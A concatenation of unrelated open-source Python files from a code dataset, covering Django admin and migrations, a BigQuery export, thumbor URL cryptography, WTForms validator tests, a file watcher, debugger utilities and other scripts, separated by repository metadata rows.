from south.db import db
from south.v2 import SchemaMigration
from django.db import models


class Migration(SchemaMigration):

    def forwards(self, orm):
        # Adding model 'PaperCitation'
        db.create_table(u'common_papercitation', (
            (u'id', self.gf('django.db.models.fields.AutoField')(primary_key=True)),
            ('slug', self.gf('django.db.models.fields.CharField')(unique=True, max_length=128)),
            ('inline_citation', self.gf('django.db.models.fields.CharField')(max_length=128, blank=True)),
            ('authors', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('title', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('journal', self.gf('django.db.models.fields.TextField')(blank=True)),
            ('url', self.gf('django.db.models.fields.URLField')(max_length=200, blank=True)),
        ))
        db.send_create_signal(u'common', ['PaperCitation'])

    def backwards(self, orm):
        # Deleting model 'PaperCitation'
        db.delete_table(u'common_papercitation')

    models = {
        u'common.papercitation': {
            'Meta': {'object_name': 'PaperCitation'},
            'authors': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            u'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
            'inline_citation': ('django.db.models.fields.CharField', [], {'max_length': '128', 'blank': 'True'}),
            'journal': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'slug': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '128'}),
            'title': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
            'url': ('django.db.models.fields.URLField', [], {'max_length': '200', 'blank': 'True'})
        }
    }
    complete_apps = ['common']
| mit | -8,008,219,321,522,032,000 | 45.571429 | 113 | 0.593862 | false | 3.654206 | false | false | false |
ujdhesa/unisubs | apps/auth/admin.py | 1 | 3332 | # Amara, universalsubtitles.org
#
# Copyright (C) 2013 Participatory Culture Foundation
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program.  If not, see
# http://www.gnu.org/licenses/agpl-3.0.html.

from datetime import datetime

from django import forms
from django.contrib import admin
from django.contrib.admin import widgets
from django.contrib.auth.admin import UserAdmin
from django.contrib.auth.forms import UserCreationForm
from django.contrib.auth.models import User
from django.db import models
from django.utils.translation import ugettext_lazy as _

from models import CustomUser, Announcement


class CustomUserCreationForm(UserCreationForm):
    username = forms.RegexField(label=_("Username"), max_length=30, regex=r'^\w+$',
        help_text=_("Required. 30 characters or fewer. Alphanumeric characters only (letters, digits and underscores)."),
        error_message=_("This value must contain only letters, numbers and underscores."))
    password1 = forms.CharField(label=_("Password"), widget=forms.PasswordInput)
    password2 = forms.CharField(label=_("Password confirmation"), widget=forms.PasswordInput)
    email = forms.EmailField(label=_('Email'))

    class Meta:
        model = CustomUser
        fields = ("username", "email")


class CustomUserAdmin(UserAdmin):
    add_form = CustomUserCreationForm
    list_display = ('username', 'email', 'first_name', 'last_name', 'is_staff',
                    'is_superuser', 'last_ip', 'partner')
    search_fields = ('username', 'first_name', 'last_name', 'email', 'id')
    add_fieldsets = (
        (None, {
            'classes': ('wide',),
            'fields': ('username', 'email', 'password1', 'password2')}
         ),
    )


class AnnouncementAdmin(admin.ModelAdmin):
    formfield_overrides = {
        models.CharField: {'widget': widgets.AdminTextareaWidget}
    }
    list_display = ('content', 'created', 'visible')
    actions = ['make_hidden']

    def get_form(self, request, obj=None, **kwargs):
        form = super(AnnouncementAdmin, self).get_form(request, obj=None, **kwargs)
        default_help_text = form.base_fields['created'].help_text
        now = datetime.now()
        form.base_fields['created'].help_text = default_help_text + \
            u'</br>Current server time is %s. Value is saved without timezone converting.' % now.strftime('%m/%d/%Y %H:%M:%S')
        return form

    def visible(self, obj):
        return not obj.hidden
    visible.boolean = True

    def make_hidden(self, request, queryset):
        Announcement.clear_cache()
        queryset.update(hidden=True)
    make_hidden.short_description = _(u'Hide')


admin.site.register(Announcement, AnnouncementAdmin)
admin.site.unregister(User)
admin.site.register(CustomUser, CustomUserAdmin)
| agpl-3.0 | 7,780,854,028,149,304,000 | 39.144578 | 126 | 0.697479 | false | 3.95255 | false | false | false |
ivandavid77/learnetic_monitoreo_mcourserpro | apps/learnetic_monitoreo_mcourserpro/priv/utils/extraer_bigquery_events.py | 1 | 2669 | # -*- coding: utf-8 -*-
import sys
import csv
import datetime

from google.cloud import bigquery

if __name__ == '__main__':
    client = bigquery.Client()
    # note: the trailing space before 'AND' keeps the concatenated SQL valid
    query = (
        'SELECT * '
        'FROM `mcourser-mexico-he.events.events2017*` '
        'WHERE SUBSTR(username,0,3) IN ("DUR","JAL") '
        'AND LENGTH(username) > 9')
    query_results = client.run_sync_query(query)
    query_results.use_legacy_sql = False
    query_results.run()
    if query_results.complete:
        with open('datos_bigquery.csv', 'wb') as csvfile:
            writer = csv.writer(csvfile, quoting=csv.QUOTE_ALL)
            writer.writerow(['random_event_id','created_date','event_type','session_type','user_id',
                             'username','firstname','lastname','user_role','user_school_id','user_school_name',
                             'lesson_id','lesson_title','lesson_type','course_id','course_title','course_lessons_count',
                             'course_ebooks_count','chapter_id','chapter_title','assignment_id','group_assignment_id',
                             'assignment_grade','assignment_state','assignment_due_date','score','errors_count',
                             'checks_count','mistake_count','session_duration','request_country_code','request_region',
                             'request_city','request_citylatlon','user_agent','mlibro_system_version','mlibro_version',
                             'mlibro_type','mlibro_GUID','mlibro_language','user_email','user_first_name_adult',
                             'user_last_name_adult','user_email_adult','user_age_type','user_regulation_agreement',
                             'user_regulation_marketing','user_regulation_information','user_school_national_id',
                             'user_school_type','user_school_city','user_school_zip_code','user_school_province',
                             'user_school_country','user_school_email'])
            for row in query_results.rows:
                result = []
                for elem in row:
                    if type(elem) == unicode:
                        result.append(elem.encode('utf-8'))
                    elif type(elem) == datetime.datetime:
                        result.append(elem.strftime('%Y-%m-%d %H:%M:%S UTC'))
                    elif type(elem) == int:
                        result.append(elem)
                    elif elem == None:
                        result.append('')
                    else:
                        result.append(elem)
                writer.writerow(result)
    elif query_results.errors:
        print(str(query_results.errors))
        sys.exit(1)
| bsd-3-clause | 8,337,022,794,136,258,000 | 53.469388 | 120 | 0.529786 | false | 4.118827 | false | false | false |
APSL/libthumbor | tests/thumbor_py3/crypto.py | 2 | 3928 | #!/usr/bin/python
# -*- coding: utf-8 -*-

# thumbor imaging service
# https://github.com/globocom/thumbor/wiki

# Licensed under the MIT license:
# http://www.opensource.org/licenses/mit-license
# Copyright (c) 2011 globo.com timehome@corp.globo.com

import base64
import hashlib
import hmac

from Crypto.Cipher import AES

from .url import Url
from six import text_type, PY3, b, PY2


class Cryptor(object):
    def __init__(self, security_key):
        self.security_key = (security_key * 16)[:16]

    def encrypt(self,
                width,
                height,
                smart,
                adaptive,
                full,
                fit_in,
                flip_horizontal,
                flip_vertical,
                halign,
                valign,
                trim,
                crop_left,
                crop_top,
                crop_right,
                crop_bottom,
                filters,
                image):

        generated_url = Url.generate_options(
            width=width,
            height=height,
            smart=smart,
            meta=False,
            adaptive=adaptive,
            full=full,
            fit_in=fit_in,
            horizontal_flip=flip_horizontal,
            vertical_flip=flip_vertical,
            halign=halign,
            valign=valign,
            trim=trim,
            crop_left=crop_left,
            crop_top=crop_top,
            crop_right=crop_right,
            crop_bottom=crop_bottom,
            filters=filters
        )

        url = "%s/%s" % (generated_url, hashlib.md5(b(image)).hexdigest())

        pad = lambda s: s + (16 - len(s) % 16) * "{"
        cipher = AES.new(self.security_key)
        if PY2:
            url = url.encode('utf-8')
        encrypted = base64.urlsafe_b64encode(cipher.encrypt(pad(url)))

        return encrypted

    def get_options(self, encrypted_url_part, image_url):
        try:
            opt = self.decrypt(encrypted_url_part)
        except ValueError:
            opt = None

        if not opt and not self.security_key and self.context.config.STORES_CRYPTO_KEY_FOR_EACH_IMAGE:
            security_key = self.storage.get_crypto(image_url)

            if security_key is not None:
                cr = Cryptor(security_key)
                try:
                    opt = cr.decrypt(encrypted_url_part)
                except ValueError:
                    opt = None

        if opt is None:
            return None

        image_hash = opt and opt.get('image_hash')
        image_hash = image_hash[1:] if image_hash and image_hash.startswith('/') else image_hash

        path_hash = hashlib.md5(image_url.encode('utf-8')).hexdigest()

        if not image_hash or image_hash != path_hash:
            return None

        opt['image'] = image_url
        opt['hash'] = opt['image_hash']
        del opt['image_hash']

        return opt

    def decrypt(self, encrypted):
        cipher = AES.new(self.security_key)

        try:
            debased = base64.urlsafe_b64decode(encrypted.encode("utf-8"))
            decrypted = cipher.decrypt(debased)
            if PY3:
                decrypted = decrypted.decode('ascii')
            decrypted = decrypted.rstrip('{')
        except TypeError:
            return None

        result = Url.parse_decrypted('/%s' % decrypted)

        result['image_hash'] = result['image']
        del result['image']

        return result
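
# Round-trip sketch (illustrative only; the key and image name are made up):
#   c = Cryptor('my-security-key')
#   token = c.encrypt(300, 200, False, False, False, False, False, False,
#                     'center', 'middle', False, 0, 0, 0, 0, '', 'img.jpg')
#   c.decrypt(token)  # -> dict of the options encoded in the token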

class Signer:
    def __init__(self, security_key):
        if isinstance(security_key, text_type):
            security_key = security_key.encode('utf-8')
        self.security_key = security_key

    def validate(self, actual_signature, url):
        url_signature = self.signature(url)
        return url_signature == actual_signature

    def signature(self, url):
        return base64.urlsafe_b64encode(hmac.new(self.security_key, text_type(url).encode('utf-8'), hashlib.sha1).digest())
| mit | -3,555,383,855,582,258,700 | 27.258993 | 123 | 0.541752 | false | 3.987817 | false | false | false |
HydrelioxGitHub/home-assistant | homeassistant/components/sensor/demo.py | 8 | 1876 | """
Demo platform that has a couple of fake sensors.

For more details about this platform, please refer to the documentation
https://home-assistant.io/components/demo/
"""
from homeassistant.const import (
    ATTR_BATTERY_LEVEL, TEMP_CELSIUS, DEVICE_CLASS_HUMIDITY,
    DEVICE_CLASS_TEMPERATURE)
from homeassistant.helpers.entity import Entity


def setup_platform(hass, config, add_entities, discovery_info=None):
    """Set up the Demo sensors."""
    add_entities([
        DemoSensor('Outside Temperature', 15.6, DEVICE_CLASS_TEMPERATURE,
                   TEMP_CELSIUS, 12),
        DemoSensor('Outside Humidity', 54, DEVICE_CLASS_HUMIDITY, '%', None),
    ])


class DemoSensor(Entity):
    """Representation of a Demo sensor."""

    def __init__(self, name, state, device_class,
                 unit_of_measurement, battery):
        """Initialize the sensor."""
        self._name = name
        self._state = state
        self._device_class = device_class
        self._unit_of_measurement = unit_of_measurement
        self._battery = battery

    @property
    def should_poll(self):
        """No polling needed for a demo sensor."""
        return False

    @property
    def device_class(self):
        """Return the device class of the sensor."""
        return self._device_class

    @property
    def name(self):
        """Return the name of the sensor."""
        return self._name

    @property
    def state(self):
        """Return the state of the sensor."""
        return self._state

    @property
    def unit_of_measurement(self):
        """Return the unit this state is expressed in."""
        return self._unit_of_measurement

    @property
    def device_state_attributes(self):
        """Return the state attributes."""
        if self._battery:
            return {
                ATTR_BATTERY_LEVEL: self._battery,
            }
| apache-2.0 | -2,061,182,217,085,773,000 | 27.861538 | 77 | 0.61887 | false | 4.225225 | false | false | false |
CyrilWaechter/pyRevitMEP | pyRevitMEP.tab/Lab.panel/Lab.pulldown/AutoInsulate.pushbutton/script.py | 1 | 3350 | # coding: utf8
import rpw
from rpw import DB, revit
from rpw import logger

__doc__ = "Automatically insulate the selected MEP elements"
__title__ = "Auto Insulate"
__author__ = "Cyril Waechter"
__context__ = "Selection"


# TODO
def apply_size_rule(size, rule):
    pass


def set_system_rule(mep_system):
    mep_system
    return  # rule


def get_element_mep_systems(element):
    mep_system = []
    if isinstance(element, DB.MEPCurve):
        mep_system.append(element.MEPsystem)
    elif isinstance(element, DB.FamilyInstance):
        for connector in element.MEPModel.ConnectorManager.Connectors:
            if connector.MEPSystem:
                mep_system.append(element.MEPModel.ConnectorManager.Connectors)
    else:
        logger.info("No system found in element {}".format(element))
    return mep_system


def get_nominal_diameter(element):
    if isinstance(element, DB.MEPCurve):
        return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_DIAMETER_PARAM).AsDouble()
    if isinstance(element, DB.FamilyInstance):
        return 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)


class ConnectorsBreadthFirstSearch:
    def __init__(self, element):
        self.element = element
        self.nominal_diameter = 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
        self.queue = [element]
        self.visited = []

    def outside_diameter_search(self):
        if self.queue:
            current_element = self.queue.pop(0)
            print current_element
            if isinstance(current_element, DB.Plumbing.Pipe):
                return current_element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_OUTER_DIAMETER).AsDouble()
            else:
                self.visited.append(current_element)
                for connector in current_element.MEPModel.ConnectorManager.Connectors:
                    for ref in connector.AllRefs:
                        if isinstance(ref.Owner, (DB.FamilyInstance, DB.Plumbing.Pipe)):
                            if ref.Owner not in self.visited and ref.Radius * 2 >= self.nominal_diameter:
                                self.queue.append(ref.Owner)
                return self.outside_diameter_search()
        else:
            return self.nominal_diameter
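
# Usage sketch (illustrative; assumes `element` is a pipe accessory selected
# in Revit): the search walks connected references breadth-first until it
# reaches a Pipe, then reports that pipe's outer diameter; otherwise it falls
# back to the accessory's own nominal diameter.
#   search = ConnectorsBreadthFirstSearch(element)
#   outer_diameter = search.outside_diameter_search()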
def get_outer_diameter(element):
    if isinstance(element, DB.Plumbing.Pipe):
        return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_OUTER_DIAMETER).AsDouble()
    if isinstance(element, DB.FamilyInstance):
        for connector in element.MEPModel.ConnectorManager.Connectors:
            for sub_con in connector.AllRefs:
                logger.debug(sub_con.Owner)
                # return the first outer diameter found down the chain
                return get_outer_diameter(sub_con.Owner)
def get_inner_diameter(element):
    if isinstance(element, DB.MEPCurve):
        return element.get_Parameter(DB.BuiltInParameter.RBS_PIPE_INNER_DIAM_PARAM).AsDouble()
    if isinstance(element, DB.FamilyInstance):
        # connectors expose a radius, so double the largest one
        return 2 * max(connector.Radius for connector in element.MEPModel.ConnectorManager.Connectors)
# InsulationLiningBase.GetInsulationIds
# for element in rpw.ui.Selection():
# element
# # TODO Determine system rule
# mep_systems = get_element_mep_systems(element)
# if mep_systems:
# rule = set_system_rule(mep_systems[0])
# # TODO Apply size rule
# apply_size_rule(size, rule)
# TODO GUI to set and save configuration
| gpl-3.0 | 5,746,081,570,516,607,000 | 34.638298 | 119 | 0.664776 | false | 3.669222 | false | false | false |
webitup/python3-wforms | tests/validators.py | 1 | 9174 | #!/usr/bin/env python
from unittest import TestCase
from wtforms.validators import StopValidation, ValidationError, email, equal_to, ip_address, length, required, optional, regexp, url, NumberRange, AnyOf, NoneOf, unicode
class DummyTranslations(object):
def gettext(self, string):
return string
def ngettext(self, singular, plural, n):
if n == 1:
return singular
return plural
class DummyForm(dict):
pass
class DummyField(object):
_translations = DummyTranslations()
def __init__(self, data, errors=(), raw_data=None):
self.data = data
self.errors = list(errors)
self.raw_data = raw_data
def gettext(self, string):
return self._translations.gettext(string)
def ngettext(self, singular, plural, n):
return self._translations.ngettext(singular, plural, n)
def grab_error_message(callable, form, field):
try:
callable(form, field)
except ValidationError:
import sys
e = sys.exc_info()[1]
return e.args[0]
class ValidatorsTest(TestCase):
def setUp(self):
self.form = DummyForm()
def test_email(self):
self.assertEqual(email()(self.form, DummyField('foo@bar.dk')), None)
self.assertEqual(email()(self.form, DummyField('123@bar.dk')), None)
self.assertEqual(email()(self.form, DummyField('foo@456.dk')), None)
self.assertEqual(email()(self.form, DummyField('foo@bar456.info')), None)
self.assertRaises(ValidationError, email(), self.form, DummyField(None))
self.assertRaises(ValidationError, email(), self.form, DummyField(''))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo'))
self.assertRaises(ValidationError, email(), self.form, DummyField('bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@'))
self.assertRaises(ValidationError, email(), self.form, DummyField('@bar.dk'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@bar.ab12'))
self.assertRaises(ValidationError, email(), self.form, DummyField('foo@.bar.ab'))
def test_equal_to(self):
self.form['foo'] = DummyField('test')
self.assertEqual(equal_to('foo')(self.form, self.form['foo']), None)
self.assertRaises(ValidationError, equal_to('invalid_field_name'), self.form, DummyField('test'))
self.assertRaises(ValidationError, equal_to('foo'), self.form, DummyField('different_value'))
def test_ip_address(self):
self.assertEqual(ip_address()(self.form, DummyField('127.0.0.1')), None)
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('abc.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('1278.0.0.1'))
self.assertRaises(ValidationError, ip_address(), self.form, DummyField('127.0.0.abc'))
def test_length(self):
field = DummyField('foobar')
self.assertEqual(length(min=2, max=6)(self.form, field), None)
self.assertRaises(ValidationError, length(min=7), self.form, field)
self.assertEqual(length(min=6)(self.form, field), None)
self.assertRaises(ValidationError, length(max=5), self.form, field)
self.assertEqual(length(max=6)(self.form, field), None)
self.assertRaises(AssertionError, length)
self.assertRaises(AssertionError, length, min=5, max=2)
# Test new formatting features
grab = lambda **k : grab_error_message(length(**k), self.form, field)
self.assertEqual(grab(min=2, max=5, message='%(min)d and %(max)d'), '2 and 5')
self.assert_('at least 8' in grab(min=8))
self.assert_('longer than 5' in grab(max=5))
self.assert_('between 2 and 5' in grab(min=2, max=5))
def test_required(self):
self.assertEqual(required()(self.form, DummyField('foobar')), None)
self.assertRaises(StopValidation, required(), self.form, DummyField(''))
self.assertRaises(StopValidation, required(), self.form, DummyField(' '))
self.assertEqual(required().field_flags, ('required', ))
f = DummyField('', ['Invalid Integer Value'])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, required(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_optional(self):
self.assertEqual(optional()(self.form, DummyField('foobar', raw_data=['foobar'])), None)
self.assertRaises(StopValidation, optional(), self.form, DummyField('', raw_data=['']))
self.assertRaises(StopValidation, optional(), self.form, DummyField(' ', raw_data=[' ']))
self.assertEqual(optional().field_flags, ('optional', ))
f = DummyField('', ['Invalid Integer Value'], raw_data=[''])
self.assertEqual(len(f.errors), 1)
self.assertRaises(StopValidation, optional(), self.form, f)
self.assertEqual(len(f.errors), 0)
def test_regexp(self):
import re
# String regexp
self.assertEqual(regexp('^a')(self.form, DummyField('abcd')), None)
self.assertEqual(regexp('^a', re.I)(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp('^a'), self.form, DummyField(None))
# Compiled regexp
self.assertEqual(regexp(re.compile('^a'))(self.form, DummyField('abcd')), None)
self.assertEqual(regexp(re.compile('^a', re.I))(self.form, DummyField('ABcd')), None)
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField('foo'))
self.assertRaises(ValidationError, regexp(re.compile('^a')), self.form, DummyField(None))
def test_url(self):
self.assertEqual(url()(self.form, DummyField('http://foobar.dk')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.dk/')), None)
self.assertEqual(url()(self.form, DummyField('http://foobar.museum/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1/foobar')), None)
self.assertEqual(url()(self.form, DummyField('http://127.0.0.1:9000/fake')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://localhost/foobar')), None)
self.assertEqual(url(require_tld=False)(self.form, DummyField('http://foobar')), None)
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar'))
self.assertRaises(ValidationError, url(), self.form, DummyField('foobar.dk'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://127.0.0/asdf'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.d'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://foobar.12'))
self.assertRaises(ValidationError, url(), self.form, DummyField('http://localhost:abc/a'))
def test_number_range(self):
v = NumberRange(min=5, max=10)
self.assertEqual(v(self.form, DummyField(7)), None)
self.assertRaises(ValidationError, v, self.form, DummyField(None))
self.assertRaises(ValidationError, v, self.form, DummyField(0))
self.assertRaises(ValidationError, v, self.form, DummyField(12))
onlymin = NumberRange(min=5)
self.assertEqual(onlymin(self.form, DummyField(500)), None)
self.assertRaises(ValidationError, onlymin, self.form, DummyField(4))
onlymax = NumberRange(max=50)
self.assertEqual(onlymax(self.form, DummyField(30)), None)
self.assertRaises(ValidationError, onlymax, self.form, DummyField(75))
def test_lazy_proxy(self):
"""Tests that the validators support lazy translation strings for messages."""
class ReallyLazyProxy(object):
def __unicode__(self):
raise Exception('Translator function called during form declaration: it should be called at response time.')
__str__ = __unicode__
message = ReallyLazyProxy()
self.assertRaises(Exception, str, message)
self.assertRaises(Exception, unicode, message)
self.assert_(equal_to('fieldname', message=message))
self.assert_(length(min=1, message=message))
self.assert_(NumberRange(1,5, message=message))
self.assert_(required(message=message))
self.assert_(regexp('.+', message=message))
self.assert_(email(message=message))
self.assert_(ip_address(message=message))
self.assert_(url(message=message))
def test_any_of(self):
self.assertEqual(AnyOf(['a', 'b', 'c'])(self.form, DummyField('b')), None)
self.assertRaises(ValueError, AnyOf(['a', 'b', 'c']), self.form, DummyField(None))
def test_none_of(self):
self.assertEqual(NoneOf(['a', 'b', 'c'])(self.form, DummyField('d')), None)
self.assertRaises(ValueError, NoneOf(['a', 'b', 'c']), self.form, DummyField('a'))
if __name__ == '__main__':
from unittest import main
main()
| bsd-3-clause | -3,406,957,340,670,500,400 | 49.685083 | 169 | 0.653913 | false | 3.849769 | true | false | false |
Rayvenden/scripts | watcher.py | 1 | 1673 | #!/usr/bin/python3
import argparse
import os
import subprocess
import time
import signal
# Avoid zombie process
signal.signal(signal.SIGCHLD, signal.SIG_IGN)
# Exit after receiving Control-C
signal.signal(signal.SIGINT, signal.SIG_DFL)
parser = argparse.ArgumentParser(prog='watcher.py',
description='Simple filesystem watcher')
parser.add_argument('-l', '--files-list',
help='document with list of files to observe')
parser.add_argument('-f', '--files', nargs='*',
help='files to observe')
parser.add_argument('-c', '--command',
help='command to execute')
parser.add_argument('-n', '--no-shell', action='store_false',
help='do not use shell while evaluating command')
args = parser.parse_args()
if args.files_list is not None:
files = [line.rstrip('\n') for line in open(args.files_list)]
elif args.files:
files = args.files
else:
files = os.listdir()
# get initial modification time for files
for k, v in enumerate(files):
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(v)
files[k] = [v, mtime]
args.command = '' if not args.command else args.command
process = subprocess.Popen(args.command, shell=args.no_shell)
# watch & restart loop
while 1:
reloaded = False
for k, v in enumerate(files):
(mode, ino, dev, nlink, uid, gid, size, atime, mtime, ctime) = os.stat(v[0])
if mtime != v[1] and not reloaded:
try:
process.wait(1)
except:
process.send_signal(1)
process = subprocess.Popen(args.command, shell=args.no_shell)
reloaded = True
files[k][1] = mtime
time.sleep(1)
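# Illustrative invocations (shell), assuming this file is executable:
#   ./watcher.py -f app.py templates/base.html -c "python3 app.py"
#   ./watcher.py -l watchlist.txt -c "make test"
# With no -f/-l given, every file in the current directory is watched.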
| bsd-3-clause | 8,947,274,092,214,116,000 | 29.981481 | 84 | 0.644351 | false | 3.428279 | false | false | false |
ArcherSys/ArcherSys | eclipse/plugins/org.python.pydev_4.5.5.201603221110/pysrc/_pydevd_bundle/pydevd_utils.py | 1 | 5587 | from __future__ import nested_scopes
import traceback
import os
try:
from urllib import quote
except:
from urllib.parse import quote # @UnresolvedImport
from _pydevd_bundle import pydevd_constants
import sys
from _pydev_bundle import pydev_log
def save_main_module(file, module_name):
# patch provided by: Scott Schlesier - when script is run, it does not
# use globals from pydevd:
# This will prevent the pydevd script from contaminating the namespace for the script to be debugged
# pretend pydevd is not the main module, and
# convince the file to be debugged that it was loaded as main
sys.modules[module_name] = sys.modules['__main__']
sys.modules[module_name].__name__ = module_name
from imp import new_module
m = new_module('__main__')
sys.modules['__main__'] = m
if hasattr(sys.modules[module_name], '__loader__'):
setattr(m, '__loader__', getattr(sys.modules[module_name], '__loader__'))
m.__file__ = file
return m
def to_number(x):
if is_string(x):
try:
n = float(x)
return n
except ValueError:
pass
l = x.find('(')
if l != -1:
y = x[0:l-1]
#print y
try:
n = float(y)
return n
except ValueError:
pass
return None
def compare_object_attrs(x, y):
try:
if x == y:
return 0
x_num = to_number(x)
y_num = to_number(y)
if x_num is not None and y_num is not None:
if x_num - y_num<0:
return -1
else:
return 1
if '__len__' == x:
return -1
if '__len__' == y:
return 1
return x.__cmp__(y)
except:
if pydevd_constants.IS_PY3K:
return (to_string(x) > to_string(y)) - (to_string(x) < to_string(y))
else:
return cmp(to_string(x), to_string(y))
def cmp_to_key(mycmp):
'Convert a cmp= function into a key= function'
class K(object):
def __init__(self, obj, *args):
self.obj = obj
def __lt__(self, other):
return mycmp(self.obj, other.obj) < 0
def __gt__(self, other):
return mycmp(self.obj, other.obj) > 0
def __eq__(self, other):
return mycmp(self.obj, other.obj) == 0
def __le__(self, other):
return mycmp(self.obj, other.obj) <= 0
def __ge__(self, other):
return mycmp(self.obj, other.obj) >= 0
def __ne__(self, other):
return mycmp(self.obj, other.obj) != 0
return K
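# Illustrative use of the adapter above with the cmp-style comparator
# (hypothetical data; numeric-looking strings sort numerically):
#   sorted(['10', '2', 'b', '__len__'], key=cmp_to_key(compare_object_attrs))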
if pydevd_constants.IS_PY3K:
def is_string(x):
return isinstance(x, str)
else:
def is_string(x):
return isinstance(x, basestring)
def to_string(x):
if is_string(x):
return x
else:
return str(x)
def print_exc():
if traceback:
traceback.print_exc()
if pydevd_constants.IS_PY3K:
def quote_smart(s, safe='/'):
return quote(s, safe)
else:
def quote_smart(s, safe='/'):
if isinstance(s, unicode):
s = s.encode('utf-8')
return quote(s, safe)
def _get_project_roots(project_roots_cache=[]):
# Note: the project_roots_cache is the same instance among the many calls to the method
if not project_roots_cache:
roots = os.getenv('IDE_PROJECT_ROOTS', '').split(os.pathsep)
pydev_log.debug("IDE_PROJECT_ROOTS %s\n" % roots)
new_roots = []
for root in roots:
new_roots.append(os.path.normcase(root))
project_roots_cache.append(new_roots)
return project_roots_cache[-1] # returns the project roots with case normalized
def not_in_project_roots(filename, filename_to_not_in_scope_cache={}):
# Note: the filename_to_not_in_scope_cache is the same instance among the many calls to the method
try:
return filename_to_not_in_scope_cache[filename]
except:
project_roots = _get_project_roots()
filename = os.path.normcase(filename)
for root in project_roots:
if filename.startswith(root):
filename_to_not_in_scope_cache[filename] = False
break
else: # for else (only called if the break wasn't reached).
filename_to_not_in_scope_cache[filename] = True
# at this point it must be loaded.
return filename_to_not_in_scope_cache[filename]
def is_filter_enabled():
return os.getenv('PYDEVD_FILTERS') is not None
def is_filter_libraries():
return os.getenv('PYDEVD_FILTER_LIBRARIES') is not None
def _get_stepping_filters(filters_cache=[]):
if not filters_cache:
filters = os.getenv('PYDEVD_FILTERS', '').split(';')
new_filters = []
for new_filter in filters:
new_filters.append(new_filter)
filters_cache.append(new_filters)
return filters_cache[-1]
def is_ignored_by_filter(filename, filename_to_ignored_by_filters_cache={}):
try:
return filename_to_ignored_by_filters_cache[filename]
except:
import fnmatch
for stepping_filter in _get_stepping_filters():
if fnmatch.fnmatch(filename, stepping_filter):
pydev_log.debug("File %s ignored by filter %s" % (filename, stepping_filter))
filename_to_ignored_by_filters_cache[filename] = True
break
else:
filename_to_ignored_by_filters_cache[filename] = False
return filename_to_ignored_by_filters_cache[filename]
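# Example environment setup (hypothetical values): semicolon-separated
# fnmatch patterns decide which files stepping should skip, e.g.
#   PYDEVD_FILTERS="*/site-packages/*;*/lib/python*"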
| mit | -831,696,770,111,931,300 | 29.2 | 104 | 0.581171 | false | 3.649249 | false | false | false |
ric2b/Vivaldi-browser | chromium/third_party/polymer/v1_0/create_components_summary.py | 10 | 1643 | # Copyright 2016 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import json
import os
import re
COMPONENTS_DIR = 'components'
DESTINATION_COMPONENTS_DIR = 'components-chromium'
COMPONENT_SUMMARY =\
"""Name: %(name)s
Repository: %(repository)s
Tree: %(tree)s
Revision: %(revision)s
Tree link: %(tree_link)s
"""
def PrintSummary(info):
repository = info['_source']
resolution = info['_resolution']
tree = GetTreeishName(resolution)
# Convert to web link.
repository_web = re.sub('^git:', 'https:', re.sub('\.git$', '', repository))
# Specify tree to browse to.
tree_link = repository_web + '/tree/' + tree
print COMPONENT_SUMMARY % {
'name': info['name'],
'repository': repository,
'tree': tree,
'revision': resolution['commit'],
'tree_link': tree_link
}
def GetTreeishName(resolution):
"""Gets the name of the tree-ish (branch, tag or commit)."""
if resolution['type'] == 'branch':
return resolution['branch']
if resolution['type'] in ('version', 'tag'):
return resolution['tag']
return resolution['commit']
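# For reference, the relevant part of a .bower.json file looks roughly like
# (hypothetical values):
#   {"name": "polymer", "_source": "git://github.com/Polymer/polymer.git",
#    "_resolution": {"type": "version", "tag": "v1.2.0", "commit": "abc123"}}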
def main():
for entry in sorted(os.listdir(DESTINATION_COMPONENTS_DIR)):
component_path = os.path.join(COMPONENTS_DIR, entry)
if not os.path.isdir(component_path):
continue
bower_path = os.path.join(component_path, '.bower.json')
if not os.path.isfile(bower_path):
raise Exception('%s is not a file.' % bower_path)
with open(bower_path) as stream:
info = json.load(stream)
PrintSummary(info)
if __name__ == '__main__':
main()
| bsd-3-clause | -7,055,168,873,998,143,000 | 25.934426 | 79 | 0.666464 | false | 3.503198 | false | false | false |
RiiConnect24/File-Maker | Channels/Everybody_Votes_Channel/voteslists.py | 1 | 10385 | #!/usr/bin/python
# -*- coding: utf-8 -*-
import collections
"""List of countries the EVC uses."""
countries = collections.OrderedDict()
